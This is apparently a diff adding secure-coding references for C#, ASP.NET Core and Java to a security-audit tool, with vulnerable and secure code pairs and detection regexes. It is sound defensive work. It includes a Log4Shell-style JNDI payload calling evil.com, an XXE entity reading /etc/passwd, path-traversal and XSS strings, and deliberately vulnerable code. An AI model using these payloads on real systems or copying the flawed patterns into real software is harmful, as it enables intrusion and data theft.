+// VULNERABLE: Optional properties may be unset
+public class AuthToken
+{
+    public string UserId { get; set; }
+    public string Token { get; set; }
+    public DateTime Expiry { get; set; }
+}
+
+var token = new AuthToken { UserId = "admin" };
+// Token and Expiry are default — null and DateTime.MinValue
+// Checks against Expiry may pass (MinValue < now is true, but wrong semantics)
+```
+
+```csharp
+// SECURE: Required members force complete initialization
+public class AuthToken
+{
+    public required string UserId { get; init; }
+    public required string Token { get; init; }
+    public required DateTime Expiry { get; init; }
+}
+
+var token = new AuthToken
+{
+    UserId = "admin",
+    Token = GenerateToken(),
+    Expiry = DateTime.UtcNow.AddHours(1)
+};
+// Omitting any required property is a compile-time error
+```
+
+**Security implication:** The `required` modifier (CWE-665 prevention) ensures all security-critical fields are initialized. Without it, uninitialized DateTime fields default to `DateTime.MinValue`, which can cause unexpected behavior in expiry checks.
+
+---
+
+### Raw String Literals for Safe Query Templates
+
+Raw string literals eliminate escaping issues in SQL, regex, and configuration strings.
+
+```csharp
+// VULNERABLE: Escaping errors in complex queries
+string query = "SELECT * FROM Users WHERE Name = @name AND Role = 'admin\'s role'";
+// Easy to get escaping wrong, leading to SQL syntax errors or injection
+
+// VULNERABLE: Regex escaping mistakes
+string pattern = "password\\s*=\\s*['\"][^'\"]+['\"]";
+// Hard to verify correctness with all the backslashes
+```
+
+```csharp
+// SECURE: Raw string literals — no escaping needed
+string query = """
+    SELECT * FROM Users
+    WHERE Name = @name
+    AND Role = 'admin''s role'
+    """;
+
+// SECURE: Regex is readable and verifiable
+string pattern = """password\s*=\s*['"][^'"]+['"]""";
+```
+
+**Security implication:** Raw string literals reduce the risk of escaping errors in SQL queries, regular expressions, and configuration strings. When escape sequences are wrong, they can lead to SQL injection, regex denial of service, or configuration bypass.
+
+---
+
+## C# 12+
+
+### Primary Constructors for Concise Validation
+
+Primary constructors reduce boilerplate while still enabling constructor validation.
+
+```csharp
+// C# 12: Primary constructor with validation
+public class SecureService(ILogger<SecureService> logger, IEncryptionService encryption)
+{
+    private readonly ILogger<SecureService> _logger = logger
+        ?? throw new ArgumentNullException(nameof(logger));
+    private readonly IEncryptionService _encryption = encryption
+        ?? throw new ArgumentNullException(nameof(encryption));
+
+    public string Encrypt(string data)
+    {
+        _logger.LogInformation("Encrypting data");
+        return _encryption.Encrypt(data);
+    }
+}
+```
+
+**Security implication:** Primary constructors reduce boilerplate code where security-critical null checks might be omitted. Combined with `required` members, they ensure complete initialization of service dependencies.
+
+---
+
+### Collection Expressions for Allowlists
+
+Collection expressions provide concise syntax for defining security allowlists.
+
+```csharp
+// C# 12: Collection expressions for security configuration
+public static class SecurityPolicy
+{
+    public static readonly IReadOnlyList<string> AllowedOrigins =
+        ["https://app.example.com", "https://admin.example.com"];
+
+    public static readonly IReadOnlySet<string> AllowedMethods =
+        (IReadOnlySet<string>)new HashSet<string>(["GET", "POST", "PUT"]);
+
+    public static readonly IReadOnlyList<string> BlockedExtensions =
+        [".exe", ".bat", ".cmd", ".ps1", ".sh", ".vbs", ".js"];
+}
+```
+
+**Security implication:** Collection expressions make security allowlists and blocklists more readable and maintainable. Clearer definitions reduce the chance of misconfiguration.
+
+---
+
+## Detection Patterns for Auditing C# Security Features
+
+| Pattern | Regex | Severity | Checkpoint ID |
+|---------|-------|----------|---------------|
+| BinaryFormatter deserialization | `new\s+BinaryFormatter\s*\(` | error | SA-CS-01 |
+| NetDataContractSerializer | `new\s+NetDataContractSerializer\s*\(` | error | SA-CS-02 |
+| SQL injection via FromSqlRaw | `FromSqlRaw\s*\(\s*\$` | error | SA-CS-03 |
+| LDAP injection via DirectorySearcher | `DirectorySearcher\s*\(\s*\$` | error | SA-CS-04 |
+| XXE via XmlDocument | `new\s+XmlDocument\s*\(` | warning | SA-CS-05 |
+| Command injection via Process.Start | `Process\.Start\s*\(` | warning | SA-CS-06 |
+| Path traversal via Path.Combine with request | `Path\.Combine\s*\([^)]*request\.` | warning | SA-CS-07 |
+| CORS AllowAnyOrigin | `AllowAnyOrigin\s*\(` | error | SA-CS-08 |
+| Weak hash MD5 | `MD5\.Create\s*\(` | warning | SA-CS-09 |
+| Insecure random System.Random | `new\s+Random\s*\(` | warning | SA-CS-10 |
+| Weak hash SHA-1 | `SHA1\.Create\s*\(` | warning | SA-CS-11 |
+| DES cryptography | `DESCryptoServiceProvider` | error | SA-CS-12 |
+| XmlTextReader without DtdProcessing | `new\s+XmlTextReader\s*\(` | warning | SA-CS-13 |
+| Origin header reflection | `Headers\[.Origin.\]` | warning | SA-CS-14 |
+| Unsafe ProcessStartInfo with ShellExecute | `UseShellExecute\s*=\s*true` | warning | SA-CS-15 |
+
+## Version Adoption Security Checklist
+
+- [ ] Upgrade to .NET 8+ for latest security defaults and API improvements
+- [ ] Replace all `BinaryFormatter` usage with `System.Text.Json` or `MessagePack`
+- [ ] Remove all `NetDataContractSerializer` usage
+- [ ] Audit all `FromSqlRaw` calls; migrate to `FromSqlInterpolated` or LINQ
+- [ ] Replace mutable DTOs with records for validated, immutable data transfer
+- [ ] Verify all XML parsers set `XmlResolver = null` and `DtdProcessing = Prohibit`
+- [ ] Replace `System.Random` with `RandomNumberGenerator` for security-sensitive uses
+- [ ] Migrate from DES/3DES to AES-GCM; from MD5/SHA-1 to SHA-256+
+- [ ] Audit all `Process.Start` calls; set `UseShellExecute = false`
+- [ ] Verify CORS policies use explicit origin allowlists
+- [ ] Use `Path.GetFullPath` and boundary checks for all file access with user input
+- [ ] Add `required` modifier to all security-critical initialization properties
+- [ ] Restrict global usings to safe namespaces only
+- [ ] Enable dependency vulnerability scanning (dotnet audit, Snyk)
+
+## Related References
+
+- `owasp-top10.md` — OWASP Top 10 mapping
+- `cwe-top25.md` — CWE Top 25 mapping
+- `input-validation.md` — Input validation patterns
+- `java-security-features.md` — Java security features
+- `php-security-features.md` — PHP security features
+
+## Changelog
+
+| Date | Change | Reason |
+|------|--------|--------|
+| 2026-03-31 | Initial release | Phase 2 — Multi-language security references |

--- a/skills/security-audit/references/csharp-security-features.md
+++ b/skills/security-audit/references/csharp-security-features.md
@@ -240,8 +240,13 @@ Constructing file paths from user input without validation allows directory trav
 string filename = request.Query["file"];
 string path = Path.Combine("/uploads", filename);
 byte[] content = File.ReadAllBytes(path);
-// Path.Combine("/uploads", "../etc/passwd") = "../etc/passwd" (!!)
-// When the second argument is a rooted path, Combine ignores the first!
+// Two distinct path-traversal failure modes to know about:
+//  (1) Relative traversal:  "../etc/passwd"  → Combine returns
+//      "/uploads/../etc/passwd", which File.ReadAllBytes happily
+//      resolves outside /uploads unless the caller re-anchors it.
+//  (2) Rooted-override:     "/etc/passwd"    → Path.Combine drops
+//      the first argument when the second is absolute, so the result
+//      is literally "/etc/passwd". This is documented behaviour.
 ```
 
 ```csharp

--- a/skills/security-audit/references/dotnet-security.md
+++ b/skills/security-audit/references/dotnet-security.md
@@ -1,0 +1,454 @@
+# .NET Security Patterns
+
+Security patterns, common misconfigurations, and detection regexes for ASP.NET Core applications.
+
+## Security Misconfiguration
+
+### Middleware Ordering — Auth Before Routing
+
+```csharp
+// VULNERABLE: Authentication middleware registered after routing/endpoints
+var app = builder.Build();
+
+app.UseRouting();
+app.MapControllers();         // Endpoints are mapped BEFORE auth runs
+app.UseAuthentication();      // Too late — requests already routed
+app.UseAuthorization();
+
+// VULNERABLE: Authorization before authentication
+var app = builder.Build();
+
+app.UseRouting();
+app.UseAuthorization();       // Cannot authorize without identity
+app.UseAuthentication();      // Wrong order
+app.MapControllers();
+
+// SECURE: Correct middleware ordering
+var app = builder.Build();
+
+app.UseRouting();
+app.UseAuthentication();      // 1. Establish identity
+app.UseAuthorization();       // 2. Check permissions
+app.MapControllers();         // 3. Route to endpoints
+```
+
+**Detection regex:** `UseAuthentication\s*\(\s*\)[\s\S]{0,200}UseRouting\s*\(\s*\)|MapControllers\s*\(\s*\)[\s\S]{0,200}UseAuthentication\s*\(\s*\)|UseAuthorization\s*\(\s*\)[\s\S]{0,200}UseAuthentication\s*\(\s*\)`
+**Severity:** error
+
+### CORS Policy Misconfiguration
+
+```csharp
+// VULNERABLE: Allowing any origin with credentials
+builder.Services.AddCors(options =>
+{
+    options.AddPolicy("Open", policy =>
+    {
+        policy.AllowAnyOrigin()     // Any origin
+              .AllowAnyMethod()
+              .AllowAnyHeader()
+              .AllowCredentials();   // With credentials — browser will block,
+                                     // but indicates intent to be wide open
+    });
+});
+
+// VULNERABLE: Wildcard origin pattern
+builder.Services.AddCors(options =>
+{
+    options.AddDefaultPolicy(policy =>
+    {
+        policy.SetIsOriginAllowed(_ => true)  // Accepts ANY origin
+              .AllowCredentials();
+    });
+});
+
+// SECURE: Explicit origin allowlist
+builder.Services.AddCors(options =>
+{
+    options.AddDefaultPolicy(policy =>
+    {
+        policy.WithOrigins(
+                "https://app.example.com",
+                "https://admin.example.com")
+              .WithMethods("GET", "POST", "PUT", "DELETE")
+              .WithHeaders("Content-Type", "Authorization")
+              .AllowCredentials();
+    });
+});
+```
+
+**Detection regex:** `AllowAnyOrigin\s*\(\s*\)|SetIsOriginAllowed\s*\(\s*_?\s*=>\s*true\s*\)`
+**Severity:** error
+
+## Injection
+
+### Entity Framework Raw SQL Injection
+
+```csharp
+// VULNERABLE: String concatenation in raw SQL
+public class ProductRepository
+{
+    private readonly AppDbContext _context;
+
+    public async Task<List<Product>> Search(string name)
+    {
+        // SQL injection via string concatenation
+        return await _context.Products
+            .FromSqlRaw("SELECT * FROM Products WHERE Name LIKE '%" + name + "%'")
+            .ToListAsync();
+    }
+}
+
+// VULNERABLE: String interpolation with FromSqlRaw (NOT parameterized)
+public async Task<List<Product>> SearchUnsafe(string name)
+{
+    var query = $"SELECT * FROM Products WHERE Name LIKE '%{name}%'";
+    return await _context.Products.FromSqlRaw(query).ToListAsync();
+}
+
+// SECURE: Use FromSqlInterpolated (auto-parameterizes)
+public async Task<List<Product>> SearchSafe(string name)
+{
+    return await _context.Products
+        .FromSqlInterpolated($"SELECT * FROM Products WHERE Name LIKE {"%" + name + "%"}")
+        .ToListAsync();
+}
+
+// SECURE: Use FromSqlRaw with explicit parameters
+public async Task<List<Product>> SearchSafeParams(string name)
+{
+    return await _context.Products
+        .FromSqlRaw("SELECT * FROM Products WHERE Name LIKE {0}", "%" + name + "%")
+        .ToListAsync();
+}
+
+// BEST: Use LINQ instead of raw SQL
+public async Task<List<Product>> SearchBest(string name)
+{
+    return await _context.Products
+        .Where(p => p.Name.Contains(name))
+        .ToListAsync();
+}
+```
+
+**Detection regex:** `FromSqlRaw\s*\(\s*\$"|FromSqlRaw\s*\(\s*"[^"]*"\s*\+|ExecuteSqlRaw\s*\(\s*\$"|ExecuteSqlRaw\s*\(\s*"[^"]*"\s*\+`
+**Severity:** error
+
+### Razor View XSS
+
+```csharp
+// VULNERABLE: Unencoded output in Razor view
+@{
+    var userComment = ViewBag.Comment;  // "<script>alert('xss')</script>"
+}
+
+<!-- This renders raw HTML — XSS -->
+@Html.Raw(userComment)
+
+<!-- Also vulnerable: writing to JavaScript context -->
+<script>
+    var data = '@Html.Raw(ViewBag.UserInput)';  // XSS in JS context
+</script>
+
+<!-- Also vulnerable: using MarkupString in Blazor/Razor components -->
+@((MarkupString)userInput)
+
+// SECURE: Use default Razor encoding (automatic)
+<p>@Model.Comment</p>  <!-- Auto-encoded by Razor -->
+
+// SECURE: Use explicit encoding for JavaScript context
+<script>
+    var data = '@Json.Serialize(Model.UserInput)';  // Properly encoded for JS
+</script>
+
+// SECURE: Sanitize if raw HTML is truly needed
+@using Ganss.Xss;
+@{
+    var sanitizer = new HtmlSanitizer();
+    var safeHtml = sanitizer.Sanitize(Model.Comment);
+}
+@Html.Raw(safeHtml)
+```
+
+**Detection regex:** `Html\.Raw\s*\((?!.*Sanitiz)|@\(\s*\(MarkupString\)\s*\w+|MarkupString\)\s*(?:userInput|input|request|query|param|data|content|comment|message|text|body|html|value)`
+**Severity:** error
+
+## Authentication & Authorization
+
+### [AllowAnonymous] Overreach
+
+```csharp
+// VULNERABLE: [AllowAnonymous] on controller exposes all actions
+[ApiController]
+[Route("api/[controller]")]
+[AllowAnonymous]                 // ALL endpoints in this controller are public
+public class UsersController : ControllerBase
+{
+    [HttpGet]
+    public IActionResult GetAll() => Ok(_users);
+
+    [HttpDelete("{id}")]         // DELETE is also anonymous!
+    public IActionResult Delete(int id)
+    {
+        _userService.Delete(id);
+        return NoContent();
+    }
+
+    [HttpPut("{id}/role")]       // Role change is also anonymous!
+    public IActionResult ChangeRole(int id, [FromBody] RoleDto dto)
+    {
+        _userService.UpdateRole(id, dto.Role);
+        return NoContent();
+    }
+}
+
+// SECURE: Apply [AllowAnonymous] only to specific actions
+[ApiController]
+[Route("api/[controller]")]
+[Authorize]                       // Controller-level auth by default
+public class UsersController : ControllerBase
+{
+    [HttpGet]
+    [AllowAnonymous]              // Only GET is public
+    public IActionResult GetAll() => Ok(_users);
+
+    [HttpDelete("{id}")]
+    [Authorize(Roles = "Admin")]  // Explicit admin role required
+    public IActionResult Delete(int id)
+    {
+        _userService.Delete(id);
+        return NoContent();
+    }
+
+    [HttpPut("{id}/role")]
+    [Authorize(Policy = "SuperAdmin")]
+    public IActionResult ChangeRole(int id, [FromBody] RoleDto dto)
+    {
+        _userService.UpdateRole(id, dto.Role);
+        return NoContent();
+    }
+}
+```
+
+**Detection regex:** `\[AllowAnonymous\]\s*(?:\r?\n\s*)*(?:public\s+class|\[(?:ApiController|Route)\])`
+**Severity:** error
+
+### Anti-Forgery Token Misuse
+
+```csharp
+// VULNERABLE: POST action without anti-forgery validation
+[HttpPost]
+public IActionResult Transfer([FromForm] TransferModel model)
+{
+    // No [ValidateAntiForgeryToken] — CSRF vulnerable
+    _bankService.Transfer(model.FromAccount, model.ToAccount, model.Amount);
+    return RedirectToAction("Success");
+}
+
+// VULNERABLE: Anti-forgery disabled globally
+builder.Services.AddControllersWithViews(options =>
+{
+    options.Filters.Add(new IgnoreAntiforgeryTokenAttribute());  // Disables for ALL actions
+});
+
+// SECURE: Add anti-forgery validation
+[HttpPost]
+[ValidateAntiForgeryToken]
+public IActionResult Transfer([FromForm] TransferModel model)
+{
+    _bankService.Transfer(model.FromAccount, model.ToAccount, model.Amount);
+    return RedirectToAction("Success");
+}
+
+// SECURE: Add anti-forgery globally via AutoValidateAntiforgeryToken
+builder.Services.AddControllersWithViews(options =>
+{
+    options.Filters.Add(new AutoValidateAntiforgeryTokenAttribute());
+});
+
+// In Razor views, include the token:
+// <form method="post">
+//     @Html.AntiForgeryToken()
+//     ...
+// </form>
+// Or use Tag Helpers (automatically included with <form> tag helper)
+```
+
+**Detection regex:** `IgnoreAntiforgeryTokenAttribute\s*\(\s*\)|IgnoreAntiforgeryToken\]`
+**Severity:** warning
+
+## Data Protection
+
+### IDataProtector Key Rotation
+
+```csharp
+// VULNERABLE: Static key material or missing key rotation config
+builder.Services.AddDataProtection()
+    .SetApplicationName("my-app");
+    // No key storage configured — keys stored in memory, lost on restart
+    // No key lifetime configured — keys never rotate
+
+// VULNERABLE: Disabling automatic key generation
+builder.Services.AddDataProtection()
+    .DisableAutomaticKeyGeneration();  // Keys will expire and never rotate
+
+// SECURE: Configure persistent storage and key rotation
+builder.Services.AddDataProtection()
+    .SetApplicationName("my-app")
+    .PersistKeysToAzureBlobStorage(blobClient)
+    .ProtectKeysWithAzureKeyVault(keyUri, credential)
+    .SetDefaultKeyLifetime(TimeSpan.FromDays(90));  // Rotate every 90 days
+
+// SECURE: For multi-server deployments, share key ring
+builder.Services.AddDataProtection()
+    .SetApplicationName("my-app")
+    .PersistKeysToDbContext<DataProtectionKeyContext>()
+    .SetDefaultKeyLifetime(TimeSpan.FromDays(90));
+```
+
+**Detection regex:** `DisableAutomaticKeyGeneration\s*\(\s*\)`
+**Severity:** warning
+
+### SignalR Authentication
+
+```csharp
+// VULNERABLE: SignalR hub without authentication
+[AllowAnonymous]  // or simply missing [Authorize]
+public class ChatHub : Hub
+{
+    public async Task SendMessage(string user, string message)
+    {
+        // Any anonymous client can broadcast messages
+        await Clients.All.SendAsync("ReceiveMessage", user, message);
+    }
+
+    public async Task JoinAdminChannel()
+    {
+        // No auth check — anyone can join admin channel
+        await Groups.AddToGroupAsync(Context.ConnectionId, "admins");
+    }
+}
+
+// SECURE: Require authentication on hub
+[Authorize]
+public class ChatHub : Hub
+{
+    public async Task SendMessage(string message)
+    {
+        var user = Context.User?.Identity?.Name
+            ?? throw new HubException("Not authenticated");
+
+        await Clients.All.SendAsync("ReceiveMessage", user, message);
+    }
+
+    [Authorize(Roles = "Admin")]
+    public async Task JoinAdminChannel()
+    {
+        await Groups.AddToGroupAsync(Context.ConnectionId, "admins");
+    }
+}
+
+// SECURE: Configure SignalR auth with JWT for WebSocket transport
+builder.Services.AddAuthentication(JwtBearerDefaults.AuthenticationScheme)
+    .AddJwtBearer(options =>
+    {
+        options.Events = new JwtBearerEvents
+        {
+            OnMessageReceived = context =>
+            {
+                // Read token from query string for WebSocket connections
+                var accessToken = context.Request.Query["access_token"];
+                var path = context.HttpContext.Request.Path;
+                if (!string.IsNullOrEmpty(accessToken) &&
+                    path.StartsWithSegments("/hubs"))
+                {
+                    context.Token = accessToken;
+                }
+                return Task.CompletedTask;
+            }
+        };
+    });
+```
+
+**Detection regex:** `class\s+\w+Hub\s*:\s*Hub\b(?![\s\S]{0,50}\[Authorize\])|(?<!\[Authorize[^\]]*\]\s*(?:\r?\n\s*)*)public\s+class\s+\w+Hub\s*:\s*Hub\b`
+**Severity:** warning
+
+## Cross-Site Scripting (XSS)
+
+### Tag Helper / HTML Helper Misuse
+
+```csharp
+// VULNERABLE: Rendering user HTML in tag helper
+<div id="comments">
+    @foreach (var comment in Model.Comments)
+    {
+        @Html.Raw(comment.Body)  // XSS — user content rendered as raw HTML
+    }
+</div>
+
+// SECURE: Let Razor auto-encode
+<div id="comments">
+    @foreach (var comment in Model.Comments)
+    {
+        <p>@comment.Body</p>  <!-- Auto-encoded -->
+    }
+</div>
+```
+
+See SA-DOTNET-04 above for the primary Razor XSS detection pattern.
+
+## Detection Patterns for .NET
+
+```csharp
+// Grep patterns for ASP.NET Core security issues:
+string[] dotnetPatterns = {
+    @"FromSqlRaw\(\$""",                   // SQL injection
+    @"Html\.Raw\(",                         // XSS via raw HTML
+    @"\[AllowAnonymous\].*class",          // Controller-wide anonymous access
+    @"AllowAnyOrigin\(\)",                 // Open CORS
+    @"IgnoreAntiforgeryToken",             // Anti-forgery disabled
+    @"DisableAutomaticKeyGeneration",      // Key rotation disabled
+    @"MapControllers.*UseAuthentication",  // Wrong middleware order
+    @"SetIsOriginAllowed.*true",           // CORS wildcard
+    @"class\s+\w+Hub\s*:\s*Hub",          // SignalR hub — verify auth
+    @"BinaryFormatter",                    // Insecure deserialization
+};
+```
+
+---
+
+## CSRF Protection
+
+### Form-Based CSRF in ASP.NET Core
+
+ASP.NET Core provides automatic anti-forgery token generation via Tag Helpers. See SA-DOTNET-06 above for configuration patterns and detection.
+
+Key points:
+- MVC: Use `[AutoValidateAntiforgeryToken]` globally or `[ValidateAntiForgeryToken]` per action
+- Razor Pages: Anti-forgery is enabled by default for `POST` handlers
+- API controllers: CSRF is generally not needed for stateless JWT/Bearer token APIs
+- SignalR: Uses its own anti-forgery mechanism via connection tokens
+
+## Remediation Priority
+
+| Finding | Severity | Remediation Timeline | Effort |
+|---------|----------|---------------------|--------|
+| Middleware ordering (SA-DOTNET-01) | Critical | Immediate | Low |
+| Raw SQL injection (SA-DOTNET-02) | Critical | Immediate | Medium |
+| [AllowAnonymous] on controller (SA-DOTNET-03) | Critical | Immediate | Low |
+| Razor XSS via Html.Raw (SA-DOTNET-04) | Critical | Immediate | Medium |
+| CORS wildcard (SA-DOTNET-05) | High | 1 week | Low |
+| Anti-forgery disabled (SA-DOTNET-06) | High | 1 week | Low |
+| Key rotation disabled (SA-DOTNET-07) | Medium | 1 month | Medium |
+| SignalR unauthenticated (SA-DOTNET-08) | Medium | 1 month | Medium |
+
+## Related References
+
+- `owasp-top10.md` — OWASP Top 10 mapping
+- `blazor-security.md` — Blazor-specific patterns (WebAssembly, server-side)
+- `spring-security.md` — Comparison with Spring Security patterns
+
+## Changelog
+
+| Date | Change | Reason |
+|------|--------|--------|
+| 2026-03-31 | Initial release | Phase 3 — framework security references |

--- a/skills/security-audit/references/dotnet-security.md
+++ b/skills/security-audit/references/dotnet-security.md
@@ -4,23 +4,19 @@ Security patterns, common misconfigurations, and detection regexes for ASP.NET C
 
 ## Security Misconfiguration
 
-### Middleware Ordering — Auth Before Routing
+### Middleware Ordering - Auth Before Routing
+
+`MapControllers()` only registers endpoints — it does not execute per-request. The order that actually matters is of the **middleware** calls: `UseRouting` → `UseAuthentication` → `UseAuthorization` → endpoint execution. Getting that sequence wrong (e.g., authorization before authentication) is what causes auth to be skipped.
 
 ```csharp
-// VULNERABLE: Authentication middleware registered after routing/endpoints
+// VULNERABLE: Authorization registered before authentication —
+// requests reach UseAuthorization with no identity established, so
+// [Authorize] attributes evaluate against an anonymous principal.
 var app = builder.Build();
 
 app.UseRouting();
-app.MapControllers();         // Endpoints are mapped BEFORE auth runs
-app.UseAuthentication();      // Too late — requests already routed
-app.UseAuthorization();
-
-// VULNERABLE: Authorization before authentication
-var app = builder.Build();
-
-app.UseRouting();
-app.UseAuthorization();       // Cannot authorize without identity
-app.UseAuthentication();      // Wrong order
+app.UseAuthorization();       // Runs before identity is set
+app.UseAuthentication();
 app.MapControllers();
 
 // SECURE: Correct middleware ordering
@@ -29,10 +25,13 @@ var app = builder.Build();
 app.UseRouting();
 app.UseAuthentication();      // 1. Establish identity
 app.UseAuthorization();       // 2. Check permissions
-app.MapControllers();         // 3. Route to endpoints
+app.MapControllers();         // 3. Register endpoints (order of the
+                              //    call relative to the auth middleware
+                              //    does not matter — MapControllers()
+                              //    only registers routes).
 ```
 
-**Detection regex:** `UseAuthentication\s*\(\s*\)[\s\S]{0,200}UseRouting\s*\(\s*\)|MapControllers\s*\(\s*\)[\s\S]{0,200}UseAuthentication\s*\(\s*\)|UseAuthorization\s*\(\s*\)[\s\S]{0,200}UseAuthentication\s*\(\s*\)`
+**Detection guidance:** flag files where `UseAuthorization()` appears before `UseAuthentication()` on the middleware pipeline, or where `UseAuthentication()` is missing entirely from a pipeline that calls `UseAuthorization()`. A line-oriented regex like `UseAuthorization\s*\([\s\S]{0,200}UseAuthentication\s*\(` catches the first case; the second needs a per-file check. Do not match on `MapControllers()`-vs-`UseAuthentication()` ordering — that is not the bug.
 **Severity:** error
 
 ### CORS Policy Misconfiguration

--- a/skills/security-audit/references/java-security-features.md
+++ b/skills/security-audit/references/java-security-features.md
@@ -1,0 +1,697 @@
+# Java Security Features by Version
+
+Modern Java versions introduce language features and API improvements that directly improve security when used correctly. This reference documents security-relevant features and common vulnerability patterns from Java 11 through Java 21.
+
+## Core Java Security Patterns
+
+### ObjectInputStream Insecure Deserialization
+
+Java serialization is one of the most dangerous features in the language. Deserializing untrusted data can lead to remote code execution through gadget chains present in common libraries.
+
+```java
+// VULNERABLE: Deserializing untrusted input without filtering
+ObjectInputStream ois = new ObjectInputStream(request.getInputStream());
+Object obj = ois.readObject(); // RCE if attacker controls the stream
+```
+
+```java
+// SECURE: Use ObjectInputFilter (Java 9+) to restrict allowed classes
+ObjectInputStream ois = new ObjectInputStream(request.getInputStream());
+ois.setObjectInputFilter(ObjectInputFilter.Config.createFilter(
+    "com.example.dto.*;!*"  // Allow only known DTO classes, reject everything else
+));
+Object obj = ois.readObject();
+
+// SECURE: Avoid Java serialization entirely — use JSON with explicit types
+ObjectMapper mapper = new ObjectMapper();
+mapper.activateDefaultTyping(
+    mapper.getPolymorphicTypeValidator(),
+    ObjectMapper.DefaultTyping.NON_FINAL
+);
+UserDto user = mapper.readValue(input, UserDto.class);
+```
+
+**Security implication:** Insecure deserialization (CWE-502) enables remote code execution. Gadget chains in libraries like Commons Collections, Spring, and Hibernate can be exploited through crafted serialized objects. Avoid `ObjectInputStream` on untrusted data entirely; if unavoidable, use `ObjectInputFilter` to allowlist specific classes.
+
+**Detection regex:** `new\s+ObjectInputStream\s*\(`
+
+---
+
+### XMLDecoder Deserialization
+
+`XMLDecoder` deserializes XML into arbitrary Java objects and can execute arbitrary method calls defined in the XML, making it equivalent to code execution.
+
+```java
+// VULNERABLE: XMLDecoder on untrusted input
+XMLDecoder decoder = new XMLDecoder(request.getInputStream());
+Object result = decoder.readObject(); // Arbitrary code execution
+decoder.close();
+```
+
+```java
+// SECURE: Use JAXB or Jackson XML with explicit type binding
+JAXBContext context = JAXBContext.newInstance(UserDto.class);
+Unmarshaller unmarshaller = context.createUnmarshaller();
+UserDto user = (UserDto) unmarshaller.unmarshal(request.getInputStream());
+```
+
+**Security implication:** `XMLDecoder` can instantiate arbitrary classes and call arbitrary methods. An attacker-controlled XML stream can achieve full remote code execution (CWE-502). Never use `XMLDecoder` on untrusted input.
+
+**Detection regex:** `new\s+XMLDecoder\s*\(`
+
+---
+
+### JNDI Injection (Log4Shell Pattern)
+
+JNDI lookups with attacker-controlled input allow loading remote classes, as demonstrated by the Log4Shell vulnerability (CVE-2021-44228).
+
+```java
+// VULNERABLE: JNDI lookup with user-controlled input
+String name = request.getParameter("resource");
+InitialContext ctx = new InitialContext();
+Object obj = ctx.lookup(name); // Attacker sends "ldap://evil.com/Exploit"
+
+// VULNERABLE: Log4j pattern (pre-2.17.0)
+logger.info("User logged in: " + username); // username = "${jndi:ldap://evil.com/a}"
+```
+
+```java
+// SECURE: Validate JNDI names against an allowlist
+private static final Set<String> ALLOWED_JNDI = Set.of(
+    "java:comp/env/jdbc/mydb",
+    "java:comp/env/mail/session"
+);
+
+String name = request.getParameter("resource");
+if (!ALLOWED_JNDI.contains(name)) {
+    throw new SecurityException("Disallowed JNDI name: " + name);
+}
+InitialContext ctx = new InitialContext();
+Object obj = ctx.lookup(name);
+
+// SECURE: Use Log4j 2.17.1+ with lookup disabled (default)
+// log4j2.formatMsgNoLookups=true (default since 2.17.0)
+```
+
+**Security implication:** JNDI injection (CWE-917) allows remote class loading and code execution. The Log4Shell vulnerability demonstrated how pervasive this risk is. Always validate JNDI names against a strict allowlist and keep Log4j updated.
+
+**Detection regex:** `InitialContext\s*\(\s*\)[\s\S]{0,100}\.lookup\s*\(`
+
+---
+
+### Reflection Abuse
+
+Java reflection can bypass access controls, invoke private methods, and instantiate arbitrary classes when fed attacker-controlled input.
+
+```java
+// VULNERABLE: Class instantiation from user input
+String className = request.getParameter("handler");
+Class<?> clazz = Class.forName(className);
+Object handler = clazz.getDeclaredConstructor().newInstance();
+((Handler) handler).handle(request);
+
+// VULNERABLE: Method invocation from user input
+String methodName = request.getParameter("action");
+Method method = service.getClass().getMethod(methodName, Request.class);
+method.invoke(service, request);
+```
+
+```java
+// SECURE: Map user input to known handlers
+private static final Map<String, Supplier<Handler>> HANDLERS = Map.of(
+    "upload", UploadHandler::new,
+    "download", DownloadHandler::new,
+    "delete", DeleteHandler::new
+);
+
+String handlerName = request.getParameter("handler");
+Supplier<Handler> factory = HANDLERS.get(handlerName);
+if (factory == null) {
+    throw new IllegalArgumentException("Unknown handler: " + handlerName);
+}
+Handler handler = factory.get();
+handler.handle(request);
+```
+
+**Security implication:** Reflection with user input (CWE-470) allows instantiation of arbitrary classes, including system-level classes that can read files, execute commands, or modify security settings. Always use allowlists or factory patterns instead.
+
+**Detection regex:** `Class\.forName\s*\(|Method\.invoke\s*\(`
+
+---
+
+### SQL Injection in JDBC
+
+String concatenation in SQL queries is the classic SQL injection vector in Java applications.
+
+```java
+// VULNERABLE: String concatenation in SQL
+String query = "SELECT * FROM users WHERE username = '" + username + "'";
+Statement stmt = connection.createStatement();
+ResultSet rs = stmt.executeQuery(query);
+
+// VULNERABLE: String format in SQL
+String query = String.format("SELECT * FROM users WHERE id = %s", userId);
+Statement stmt = connection.createStatement();
+ResultSet rs = stmt.executeQuery(query);
+```
+
+```java
+// SECURE: Use PreparedStatement with parameterized queries
+String query = "SELECT * FROM users WHERE username = ?";
+PreparedStatement pstmt = connection.prepareStatement(query);
+pstmt.setString(1, username);
+ResultSet rs = pstmt.executeQuery();
+
+// SECURE: JPA with named parameters
+TypedQuery<User> query = em.createQuery(
+    "SELECT u FROM User u WHERE u.username = :username", User.class);
+query.setParameter("username", username);
+User user = query.getSingleResult();
+```
+
+**Security implication:** SQL injection (CWE-89) allows attackers to read, modify, or delete database data, and potentially execute system commands. Always use parameterized queries through `PreparedStatement` or JPA named parameters.
+
+**Detection regex:** `(createStatement|executeQuery|executeUpdate)\s*\([^)]*\+`
+
+---
+
+### XML External Entities (XXE)
+
+`DocumentBuilderFactory` and other XML parsers in Java are vulnerable to XXE by default if external entities are not explicitly disabled.
+
+```java
+// VULNERABLE: Default DocumentBuilderFactory allows XXE
+DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
+DocumentBuilder db = dbf.newDocumentBuilder();
+Document doc = db.parse(request.getInputStream());
+// Attacker can read files: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
+```
+
+```java
+// SECURE: Disable external entities and DTDs
+DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
+dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
+dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
+dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
+dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
+dbf.setXIncludeAware(false);
+dbf.setExpandEntityReferences(false);
+DocumentBuilder db = dbf.newDocumentBuilder();
+Document doc = db.parse(request.getInputStream());
+
+// SECURE: Use SAXParserFactory with same protections
